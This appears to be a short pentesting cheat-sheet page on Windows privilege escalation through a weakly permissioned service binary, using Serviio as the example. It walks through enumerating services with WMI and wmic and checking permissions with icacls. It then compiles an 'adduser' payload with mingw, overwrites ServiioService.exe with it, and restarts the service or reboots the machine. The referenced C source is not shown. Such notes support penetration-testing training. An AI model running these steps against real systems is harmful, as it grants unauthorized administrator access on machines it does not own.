Service Enumeration
Print WMI objects with win32_service:
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Check when it runs:
wmic service get name,caption,startmode,state | findstr /si serviio
Icacls enum:
ICACLs permission mask:
Mask
Permissions
F
Full access
M
Modify access
RX
Read and execute access
R
Read-only access
W
Write-only access
Check for permissions:
icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
Add malicious exe
C code:
Build EXE :
i686-w64-mingw32-gcc adduser.c -o adduser.exe
Change EXE and execute
move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
net stop Serviio
OR
shutdown /r /t 0
Last updated